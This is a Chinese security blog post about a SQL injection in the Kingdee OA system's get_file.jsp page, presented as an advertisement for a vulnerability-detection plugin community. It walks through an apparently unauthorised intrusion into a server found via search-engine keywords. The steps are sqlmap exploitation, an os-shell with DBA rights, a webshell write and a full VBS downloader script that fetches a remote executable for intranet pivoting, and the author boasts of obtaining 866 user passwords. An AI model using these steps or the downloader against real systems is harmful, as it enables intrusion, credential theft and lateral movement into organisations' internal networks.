摘要:本次给大家分享的是四叶草安全漏洞插件社区成员“11616”童鞋提交的“金蝶办公系统get_file.jsp SQL注入”
金蝶OA?
金蝶OA协同办公管理系统以“业务联动、完整协同”的设计理念,依托信息门户,构建了协同服务、协同工具、协同应用的多层级、可灵活组合的协同应用模式,涵盖公文流转、业务审批、知识管理、工作管理、资源管理、协作沟通、数据交换等平台,全面满足客户对协同办公的关键应用。同时,支持与金蝶ERP产品的整合应用,形成覆盖大、中小企业市场和政府机关的一体化解决方案。主要功能有信息门户、知识管理、任务管理、信息与沟通、资源管理、数据分析等。
危害演示:
小编给度娘喂了几个关键字后便有了下面故事。。。
这是国内某知名办公系统---金蝶办公系统,也就是我们常说的OA系统,之前被爆出存在sql注入,四叶草安全漏洞插件社区已经生成了检测插件,后面会给大家附上检测脚本。
注入点:http://xx.xx.xx.xx:8080/Kingdee//disk/get_file.jsp?file_id=11
sqlmap直接跑一遍
sql server 2008,看权限先,
sa权限,并且是DBA,尝试下os-shell(sql server 2008执行os-shell是要看人品滴)
人品大爆发呀,直接可以执行命令,
内网,有得玩咯,需要内网转发,扫了下端口
还开放了其他web服务,发现88是IIS默认页面,直接写shell吧
新建1.txt到IIS8默认目录,IE访问
卧X,惊呆了,站库分离呀,罢了,转发吧
使用vbs下载xsocks
vbs脚本:
echo iLocal=LCase(Wscript.Arguments(1)) >>c:/123.vbs
echo iRemote=LCase(Wscript.Arguments(0)) >>c:/123.vbs
echo Set xPost=createObject("Microsoft.XMLHTTP") >>c:/123.vbs
echo xPost.Open "GET",iRemote,0 >>c:/123.vbs
echo xPost.Send() >>c:/123.vbs
echo set sGet=createObject("ADODB.Stream") >>c:/123.vbs
echo sGet.Mode=3 >>c:/123.vbs
echo sGet.Type=1 >>c:/123.vbs
echo sGet.Open() >>c:/123.vbs
echo sGet.Write xPost.ResponseBody >>c:/123.vbs
echo sGet.SaveToFile iLocal,2 >>c:/123.vbs
方法:cscript vbs路径 http://xx.xx.xx.xx/文件名.exe 文件名.exe
866个用户账号密码(我什么都没干)
已经成功进入内网,不在进一步测试,
使用这套OA系统的老大们,快来四叶草安全漏洞插件社区检测下吧。
企业OS:( ‘-ωก̀ ),你XX的就这么把我搞了?心好累
漏洞检查插件:
转载自四叶草安全漏洞插件社区
资讯/漏洞/插件/心得
关注“七安全”
微信ID:qi_anquan
长按二维码关注七安全
原文始发于微信公众号(雁行安全团队):每周一插 | 老板,您家OA系统存在漏洞会怎么样?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论